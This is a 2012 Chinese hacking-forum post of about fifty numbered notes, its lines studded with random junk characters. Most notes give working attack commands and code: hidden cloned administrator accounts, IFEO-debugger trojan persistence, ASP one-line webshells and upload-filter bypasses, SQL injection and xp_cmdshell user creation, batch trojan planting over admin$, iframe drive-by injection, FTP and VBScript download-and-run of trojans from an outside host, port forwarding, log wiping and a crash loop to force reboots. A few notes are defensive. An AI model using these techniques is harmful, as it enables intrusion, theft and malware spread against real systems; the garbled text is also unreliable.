找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2245|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
3 K4 U8 H6 O+ s; W% u: ecacls C:\windows\system32 /G hqw20:R# J6 G' \0 _4 [) L; m
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入( |" {4 l3 o+ a5 }) c
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F% @9 N5 k- E5 Q  F% U

" r. Y1 q, T/ f1 ~& h2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
6 K) F, f1 X6 x
1 y3 Q) _7 b$ {3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。4 V; {0 f3 M5 M# G' g
* r* }) F/ C+ t- F& K3 I4 T: X2 \
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
. A6 x+ l6 L# v0 Y" \. {
0 ]6 s8 d0 [! r3 `, }! a5、利用INF文件来修改注册表5 i- q0 I' Z7 g; f
[Version]
# S4 l$ \' ~! R) W6 `% pSignature="$CHICAGO$"
$ u. O- Q% x1 r. R[Defaultinstall]
# i2 ^3 _' g+ D/ I1 R3 zaddREG=Ating0 p4 B, V7 f4 r0 @; y# `4 @
[Ating]; F; c4 m& |0 T8 a
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"' D7 p$ M. f7 o6 ~( z
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
6 k8 P3 I, S5 o0 x2 Mrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
7 W; a& G+ M* M其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU$ \; p/ n7 z2 D2 P4 J6 k
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU7 @% B8 _. h; D( d% Y7 B
HKEY_CURRENT_CONFIG 简写为 HKCC
9 F% [6 F  y# I( N) \, }% b0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
0 w6 W# N3 M* W2 }1 V0 M"1"这里代表是写入或删除注册表键值中的具体数据
3 q3 Z) x: a; F) e
) q) V" Q, S' a. u* D6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
. q% d: j' H& y# z1 H+ m8 J4 q4 U多了一步就是在防火墙里添加个端口,然后导出其键值! r1 o: s% p8 V9 g1 ~& d0 h$ t$ \& w- }' S
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]7 k& U' e4 F2 @* e6 Y

9 g; l0 u, n3 C# z7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
2 U" t  I' b- v! V8 e5 w在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。" O" a* {5 @/ g" p* Z: O3 ]9 X4 o

8 U. ?2 j4 Q( H' _1 \( r' `0 R/ b8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
; R# g5 y( \! @, U+ u1 ?9 E
/ a8 z1 Q- b/ S/ @5 k9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
/ O/ }6 H# f7 a* n可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。) P3 Y! J) \( ~6 u, w! U

$ Q6 f- c2 z, h10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
, g2 Q7 W6 H* X6 i0 g
. R# u* |: f- R) h$ F& Q- Z4 y" A11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
0 x) x/ n( s3 |7 @/ J用法:xsniff –pass –hide –log pass.txt
% _% M" z% w; h' A* W
; [; n: ~0 D) M/ S- k: o6 X12、google搜索的艺术
. M0 s4 N; ~& s搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
2 e8 I6 }$ Z+ a或“字符串的语法错误”可以找到很多sql注入漏洞。6 A8 V. q8 y7 J/ b* C
# X3 M& t2 O) `9 M
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
0 K; q; `1 a( L9 `  r0 }$ n/ G& y& L
9 a0 e& T9 \# M2 O: \- P9 G2 B  K14、cmd中输入 nc –vv –l –p 19879 C7 R% X# A) E/ Y  a7 f* R
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
/ m! P' _: F& H2 D( H3 G' v; M9 j4 x: `5 ~+ n& S( l, i
15、制作T++木马,先写个ating.hta文件,内容为
- Q& a2 d3 K2 p! h+ q$ `<script language="VBScript">
' Y7 M% Y4 {! b/ M3 tset wshshell=createobject ("wscript.shell" )
$ [) S8 M4 d  r* Da=wshshell.run("你马的名称",1)# C+ H  S- O# h/ y- E- `: X, n
window.close4 u! @5 A( {) c. Q
</script>7 @% G+ S3 e1 [5 u! t% b0 `' w" f
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
  M; r2 j/ x' S% [, A' \
7 j8 G7 q  o# Z16、搜索栏里输入
" z  u7 r$ _" f) d/ r" S( U; H关键字%'and 1=1 and '%'='" T! t7 l% i$ l" Q, m  ?# ~6 X: x
关键字%'and 1=2 and '%'='# u! ~  f7 _5 `5 |8 }
比较不同处 可以作为注入的特征字符; `' U* T/ |% i) R% z% p  Z

- `' s/ ?0 ?, x* \8 L17、挂马代码<html>/ z3 p7 l, z6 l# P5 {% w, i* e5 F
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
# s7 n. u, p9 r9 _2 z( G9 r</html>
/ a4 Z% @; ^5 P( t6 }* ]: w1 R+ ~+ U+ R# s
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
0 B. ]9 f# D2 }/ V" {8 k$ a* e7 Q, S9 qnet localgroup administrators还是可以看出Guest是管理员来。9 c6 |# q& r2 D

) w1 F5 ^9 j- w1 I& l6 m19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
2 i8 }/ H; `+ s用法: 安装: instsrv.exe 服务名称 路径( T+ Y. T$ D( t3 r
卸载: instsrv.exe 服务名称 REMOVE9 A. Q6 H' }: E& _: C
; B, I7 G; y7 `, X
) V0 [: Z3 {% Y# V
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉( d, {" t8 \9 H2 j# V( x
不能注入时要第一时间想到%5c暴库。  C4 ], e+ m  ?9 ^
3 U. F; U& v/ d: x' {# j. w$ ?/ z
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
/ O; n- m0 D9 n: j$ s! p  @5 I0 l& s% [$ [; S
23、缺少xp_cmdshell时4 {6 n% k- F$ E% C; B9 W) x6 q
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
; D) [' J/ f# X1 `7 ]- J假如恢复不成功,可以尝试直接加用户(针对开3389的)) l0 y/ Q; z  J$ |4 e
declare @o int) o/ E8 G& {2 E: o7 Y3 `' [
exec sp_oacreate 'wscript.shell',@o out
" `& j. c$ c' ^1 t3 A/ A* _& qexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员  M( d  b2 G" c1 k, W2 g. Q, E, h+ k

4 ?8 {: z. A* y' r0 Z  R24.批量种植木马.bat
4 z( g; _7 k( b( Bfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
. S7 E; g, L6 b7 _for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间3 i  X& c* o" G$ A# e4 D2 k
扫描地址.txt里每个主机名一行 用\\开头: j/ n2 D1 X3 v2 r9 C- d6 i

8 W5 Q; I) _! J6 ]25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。6 W  b: Q. d0 ]8 l$ T5 k, f

: m& _: Y/ T3 ~% B  X4 R; W: w1 t26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
0 k, D' O9 f7 L; {将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
( s% K" v' p- ~- u.cer 等后缀的文件夹下都可以运行任何后缀的asp木马  S+ O, J' \& r$ v: p! Q; s
* i" r5 p/ ?, i# p: M' ?7 e
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP4 r' r: D4 q0 B  p5 i7 _
然后用#clear logg和#clear line vty *删除日志# t# e" L1 r9 F( W' T" S1 l

7 l3 D( J! b* l1 X28、电脑坏了省去重新安装系统的方法; _, W/ A( @. v6 C, [  I( w. O
纯dos下执行," [/ Y) O( t; ~% m1 K$ t& i' U
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
9 ~7 V. g, K+ {3 ?: h2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
3 A1 ?4 {7 u) u; V" J  R$ V2 K5 b5 p
29、解决TCP/IP筛选 在注册表里有三处,分别是:
' D! X; D7 u1 `% T# X. F" Z- uHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
- f  F4 h# f" A7 HHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip. j9 f6 G8 W5 E! W* v; ~/ Y* I3 y
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip4 X4 Y* a+ K' f
分别用
* S6 J, o" d4 z1 R8 ]3 l% Zregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip+ H& Y4 l7 c2 z3 L% F
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip$ z9 @" q( G1 Y) h  L
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip4 ~* D( a. M# A- Q! q
命令来导出注册表项
: F7 J  J8 w5 h- \6 Y然后把三个文件里的EnableSecurityFilters"=dword:00000001,
/ x! E! Z3 J" k2 C% \0 c改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用* N6 {; b9 `  I. V  b" _
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
# Q  Y' H3 c& l# E" q- {# I% |# s$ [' B/ ^% E1 R
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
4 x' w  H* O, r0 E8 HSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3* ^% c5 x' p7 ?5 l, o/ W# ?

* B* c% S) S1 s1 |' j31、全手工打造开3389工具8 @  b5 D/ w& A0 U4 {
打开记事本,编辑内容如下:
0 \) X( z# g% [  G; P! `+ n( zecho [Components] > c:\sql
* N( e0 t; J; n7 I' zecho TSEnable = on >> c:\sql) N% M# A6 x. ]* s# k! D
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
8 r% L+ |% ]2 i8 ~1 M: l3 v编辑好后存为BAT文件,上传至肉鸡,执行
; ^* w/ m! t5 l$ C( ]+ l/ l
/ W( p- d- J, |9 @/ m( w  T0 U32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马/ P+ O' d9 {. X0 ?8 V5 ~
, C  j+ T0 F% M, |/ ~- w
33、让服务器重启
% s% O/ e# g% ]8 O3 h  G写个bat死循环:% i) J7 {- z5 R* n, ~# W3 i
@echo off
# @+ F8 d7 }7 T+ J1 r:loop1& M  l5 a% h" s7 x, r2 E6 f& o( B
cls
9 k4 J) ~2 o$ @+ r' M9 Sstart cmd.exe( r, j# E8 i7 K1 q) j  d
goto loop1+ N3 V# T1 ?" L  k) V3 M
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
# b; }- f; P4 r' \7 N1 Q
% \) O8 f/ j4 L9 {% |/ k% g, a34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,; o9 J1 H$ T1 q1 }
@echo off
5 {; g9 }& C, H% U3 L& B$ U% {date /t >c:/3389.txt
6 }5 p, ^8 l9 |" {( h0 v( y9 ~2 Ttime /t >>c:/3389.txt6 _+ \3 u2 c" v! _, k5 y6 I4 i
attrib +s +h c:/3389.bat$ x0 n# {& t0 i; v6 ?
attrib +s +h c:/3389.txt
& g/ ^" R4 J9 k* N0 t" }1 z7 t2 d, Jnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
' k( R% y! R: f5 X并保存为3389.bat# F: ?) I& S5 v- T" V% N8 ?' s
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
8 `- g$ h) ?6 D- g" E2 ~+ O7 q# }8 r
35、有时候提不了权限的话,试试这个命令,在命令行里输入:( G9 f0 @8 j# Y2 N# I5 S& S
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
# z4 W2 a" @6 j% o& k输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
% I) |- k; f( h+ o  G6 `% n( M7 S: k) v& B" Q
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件: _2 x8 M4 R. Y
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
- ~( f! P5 e+ E4 L/ a1 secho 你的FTP账号 >>c:\1.bat //输入账号. [) H! ?( L' k) u
echo 你的FTP密码 >>c:\1.bat //输入密码9 b8 m& U8 D5 M$ s( p0 d! R
echo bin >>c:\1.bat //登入
; ?, o$ Y# o! n3 Necho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
* k! [0 v7 ?# M8 D& pecho bye >>c:\1.bat //退出0 }5 v' ~. I! a2 Z" L+ v* T
然后执行ftp -s:c:\1.bat即可" W# |/ \& I. l$ Z! `

0 d. m- @; _: t: h* `) C0 f0 g! `! j1 O% r37、修改注册表开3389两法
2 B, y$ h( U8 |3 r+ U5 t5 L(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表  B4 d1 }. h8 H, _7 s; U0 l+ A
echo Windows Registry Editor Version 5.00 >>3389.reg, W, b& ]1 L% V) U$ l
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg3 ^, Y# H7 u. j0 |* b% O
echo "Enabled"="0" >>3389.reg# R& x& W5 [  s
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
0 t8 ?. z* p' M: }! S: vNT\CurrentVersion\Winlogon] >>3389.reg5 u6 }" j8 ]: S9 `7 ?2 Y
echo "ShutdownWithoutLogon"="0" >>3389.reg
" i- u* o" D6 ~. W8 J% techo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]8 |8 j$ J9 j2 Q4 e
>>3389.reg* w6 n7 Z2 }0 j/ z2 l( A$ V
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
7 t- t# e% U8 l' Z0 vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
5 j2 A( ~8 L+ ~5 i/ p6 }! Z>>3389.reg9 R. @1 |" @) S  x
echo "TSEnabled"=dword:00000001 >>3389.reg
% O. |' m9 K4 ?# G2 p! Cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg+ e- q& |! Q$ I0 F/ K/ b
echo "Start"=dword:00000002 >>3389.reg# [6 \2 M& {6 x: ]9 a* ~. D2 S
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
% @$ R8 @  P( v" F, Z, d>>3389.reg4 v* B# T9 @% E7 Q: [; W* d
echo "Start"=dword:00000002 >>3389.reg' M; E" W$ m4 {
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg; B$ @3 ^3 K9 W* J( k
echo "Hotkey"="1" >>3389.reg
4 {/ t5 F7 T5 `4 p) Iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
7 `# a2 C7 b) \7 ^( JServer\Wds\rdpwd\Tds\tcp] >>3389.reg
8 k9 i0 y) ^. N# O+ `% a/ eecho "PortNumber"=dword:00000D3D >>3389.reg
0 C' s! p0 u/ R" E" p% g! gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% _2 z& F5 W$ d" u3 l" e& hServer\WinStations\RDP-Tcp] >>3389.reg
+ z9 C* P6 o8 l, f- D# jecho "PortNumber"=dword:00000D3D >>3389.reg* r1 Z& Z; D2 G) Y
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
( @0 d, T- U* ~0 Q9 J(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)0 X/ M# r" a: Z6 F6 S
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效1 K% R! g. o3 |  Y$ m
(2)winxp和win2003终端开启: t: c- h$ B+ A$ {' d
用以下ECHO代码写一个REG文件:$ |) |8 o# d& {2 \: N
echo Windows Registry Editor Version 5.00>>3389.reg
% o6 O$ e  V! Kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal& ~/ w" v) }8 N
Server]>>3389.reg
7 k* k% ]* N0 O0 n3 ^echo "fDenyTSConnections"=dword:00000000>>3389.reg
. ?( a4 K: |2 U8 q: N: ~) Kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal: {: A( [( L, t9 \; `0 ^
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
6 f/ Q1 m( X: g8 w9 B5 `: Kecho "PortNumber"=dword:00000d3d>>3389.reg
/ Y8 Y0 q( C  n* f1 G$ j4 J* Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
+ B& O) k+ h& m6 L. E( r4 YServer\WinStations\RDP-Tcp]>>3389.reg
  M' F: q6 E0 ^1 o' ]& qecho "PortNumber"=dword:00000d3d>>3389.reg
: F& J( S2 _: T; p然后regedit /s 3389.reg del 3389.reg
" g- `- P1 I* t0 L' j  M( V0 d$ d* nXP下不论开终端还是改终端端口都不需重启# l# z7 h# }( t6 {; e$ W

( }: b# I8 P& g  A, B4 F: ~38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃$ u5 u  x+ w1 m" h3 h9 b8 j+ b
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
; I  ?* x1 P  B  Z( Q( O
* ?" U* B- R. E& ]6 c39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!( s% ?- a, F) @6 M- @1 s) b
(1)数据库文件名应复杂并要有特殊字符* s: ?+ y' Q. t3 G+ u$ O% @
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
' V. \7 i$ I% Z; X将conn.asp文档中的
' _. O$ R8 Q7 \% W! B2 D4 x% FDBPath = Server.MapPath("数据库.mdb")& e& A7 {7 p: c: m3 l' b
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
1 |8 u# U5 v$ s
2 |: o; F5 A8 ~. \! b2 Q0 |修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置0 r) g7 v! p( ?& l( f
(3)不放在WEB目录里- m# e2 m5 v9 z

; `1 U+ u; I  t40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
' s. K+ t# D+ [  T) l可以写两个bat文件
5 D6 J1 ?. k( @& H4 x  ^! L" J, b@echo off+ N$ t( I" n9 y- i
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
, O" S. N' a5 I% i4 P9 j@del c:\winnt\system32\query.exe
- k* K. P1 y: X/ A& S@del %SYSTEMROOT%\system32\dllcache\query.exe
8 f. H# s' ~& `! [) x@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的' y/ f! b9 W$ I: u4 @
/ \+ H/ a: s: @
@echo off
6 q9 j" G$ t( T  [5 E$ N@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
! O7 ~5 j% D3 e5 u: j. }@del c:\winnt\system32\tsadmin.exe
' [" l0 G8 ~! g( ?! O+ {# R- P8 }* Q@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex$ s" F9 I7 C7 O
+ ?! S/ |1 W. M; Y
41、映射对方盘符
) z( f2 j" l: P- ~8 `telnet到他的机器上,7 L* m8 d3 R8 E4 @% K
net share 查看有没有默认共享 如果没有,那么就接着运行$ K! ?& d0 L: I- k
net share c$=c:2 b2 r$ l/ ?) \. t3 U4 n
net share现在有c$
% e6 L* t# T# c- K. T& ~, R在自己的机器上运行
7 q# ]7 w9 Z3 M6 znet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K' R# F' q4 [4 N2 k+ ?- H6 C  i
( k7 D: ^+ D% ~- Y" j
42、一些很有用的老知识, ~, Q: ^) w: J' g  \* u$ W& E3 E
type c:\boot.ini ( 查看系统版本 )' n  O* S: Z) g- w7 m, \8 I
net start (查看已经启动的服务)$ u' F) O+ ]% a' T; d8 d/ a
query user ( 查看当前终端连接 )  N0 K+ e2 v) X
net user ( 查看当前用户 )
5 b4 J$ [4 w6 J. U; Ynet user 用户 密码/add ( 建立账号 )
6 n& t) \' H. ~" Onet localgroup administrators 用户 /add (提升某用户为管理员)  z3 @: h& g" U
ipconfig -all ( 查看IP什么的 )
  M7 E' h/ P! T! vnetstat -an ( 查看当前网络状态 )
7 P' \! O0 _4 Zfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
3 k: V- T$ _% r8 {  i% j克隆时Administrator对应1F4
( W/ s6 i; |' O7 dguest对应1F5
9 r  j7 f( T4 ]% r7 Rtsinternetuser对应3E8# X, F+ s" S0 ~, Q8 x1 v$ t

. }* \" |/ ~7 F43、如果对方没开3389,但是装了Remote Administrator Service
/ s0 t* r7 X; ?4 `# n7 N' z) V用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接+ {$ x; U1 t- o/ O
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
0 R$ X2 H8 M+ t先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin". o1 P" p2 F" Y$ D

0 j2 J% l5 f+ h* N- J) {# ^44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
2 }: G7 u. e0 L3 ]本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口). W+ H- i! {5 w7 s2 C* d% H
, D" r8 S; {( ~: Q
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
$ I6 A% z$ R: Q: W. S6 Eecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open9 l* E9 ^5 T' S
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
9 y% j/ ^9 G8 A3 v3 G( `3 Q$ rCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =, g& Q' N) }8 w. D+ O* d3 f
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs. b* x  |9 k$ o! u7 `1 q  U
(这是完整的一句话,其中没有换行符)+ }& l/ ~+ y" Q8 r8 B
然后下载:
3 B* _8 O8 G  a4 B6 u! `cscript down.vbs http://www.hack520.org/hack.exe hack.exe% H  i- Q$ O  W* E) }, i

  C' _& e6 [' T: E46、一句话木马成功依赖于两个条件:; f8 n# l% f" @4 f) G3 v
1、服务端没有禁止adodb.Stream或FSO组件
. |) g8 @: g  a0 I6 _& o2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
) _0 h: U% t. e7 [! q- V. h6 t% z3 k7 |
# w+ U' J5 ~+ X, I7 A8 K47、利用DB_OWNER权限进行手工备份一句话木马的代码:
; o: x) {8 }- k% A;alter database utsz set RECOVERY FULL--
0 I+ q4 x1 P: q;create table cmd (a image)--3 ~* p; c2 T5 D0 m9 Z
;backup log utsz to disk = 'D:\cmd' with init--% e2 v' j  \- z) J' j6 n
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--+ ~  [) U  c1 S* [
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
! p+ T1 f1 `4 f5 {1 E# }注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
" T9 B4 {$ N: M' E  Q7 B) l2 c8 w# i3 p
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:  u/ I( z% P. ^- \
8 Y% `+ I) O7 U
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
! X8 E! M6 {0 N: M* U所有会话用 'all'。
' x3 y" s0 f% i* i-s sessionid 列出会话的信息。! Z4 X$ X3 ^8 v4 @; y  ?( j
-k sessionid 终止会话。& k7 g3 W, s1 T! d' W
-m sessionid 发送消息到会话。' \  m; y) Q9 p1 }

+ T  H$ S( g3 S9 Zconfig 配置 telnet 服务器参数。
$ E( H6 Z0 R  p
7 F( Y3 O' v2 Hcommon_options 为:
+ _; p3 d! l1 M-u user 指定要使用其凭据的用户3 H1 Q5 Q4 o& K9 H5 e5 W
-p password 用户密码9 \) _1 a# H4 |& C/ ^# r9 @

- ?3 p1 c$ w  j6 Econfig_options 为:
2 c* p+ \5 ~6 A% v1 u, Y2 h3 sdom = domain 设定用户的默认域
8 C1 T- o+ m, I/ f$ i" w' R! \" Kctrlakeymap = yes|no 设定 ALT 键的映射
" t( \1 g) O1 J) e3 Ktimeout = hh:mm:ss 设定空闲会话超时值$ d4 o9 t* T' ~; }% N
timeoutactive = yes|no 启用空闲会话。
& c% B2 ~8 d2 p7 d. emaxfail = attempts 设定断开前失败的登录企图数。' D) o3 S- V7 P: e
maxconn = connections 设定最大连接数。
* o/ W" f$ B, h2 z5 Lport = number 设定 telnet 端口。3 s$ q( a) \0 R. R/ v# Y& E* T" p# O
sec = [+/-]NTLM [+/-]passwd. a4 c2 \3 Y7 }, z
设定身份验证机构/ @  h, O2 ^' J  }: o: Y
fname = file 指定审计文件名。
7 w! |' O: w: g8 N* |fsize = size 指定审计文件的最大尺寸(MB)。& Y9 n0 J& w0 {9 y* g
mode = console|stream 指定操作模式。
3 J2 o4 J" `% U9 |auditlocation = eventlog|file|both# T- [, m9 N; \5 M/ g8 G0 M
指定记录地点$ Q" ^' ~0 [! F7 C9 o$ Y
audit = [+/-]user [+/-]fail [+/-]admin  Z) ~% D% l8 O# z
& R4 {3 {! v0 [2 S3 I; a/ ~  b
49、例如:在IE上访问:. L- L2 Y8 S$ [- J" H
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
, i5 H# G! f: L7 \" i# ~hack.txt里面的代码是:) D8 ?0 V# ~2 Y
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">/ E2 I4 k6 g9 q: P: x: S3 x
把这个hack.txt发到你空间就可以了!2 i" J2 a* g& u6 ^1 f# `& q
这个可以利用来做网马哦!
4 ~6 V3 }  P2 B, I' z+ D  Z3 K: O& D% O5 Q) G" ^
50、autorun的病毒可以通过手动限制!
* @8 a7 }0 b* k. A1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!9 f8 A9 D& W' ^, |4 g% ^+ E
2,打开盘符用右键打开!切忌双击盘符~2 Z/ ?4 a- Q. I2 D% a1 U# c" }9 h
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!  \& Z, k3 q$ V0 Z  ~6 t% C3 e* K

6 d4 K# m7 V' ]% D51、log备份时的一句话木马:6 F# z0 |# l% j, A. e6 D
a).<%%25Execute(request("go"))%%25>
' r# X0 q( `' c* ?' yb).<%Execute(request("go"))%># W8 E* {' T+ D& R- j
c).%><%execute request("go")%><%. h+ m+ q4 Q; B, f
d).<script language=VBScript runat=server>execute request("sb")</Script>
1 K# n- a" d$ x' z9 Y% C' I6 Je).<%25Execute(request("l"))%25>
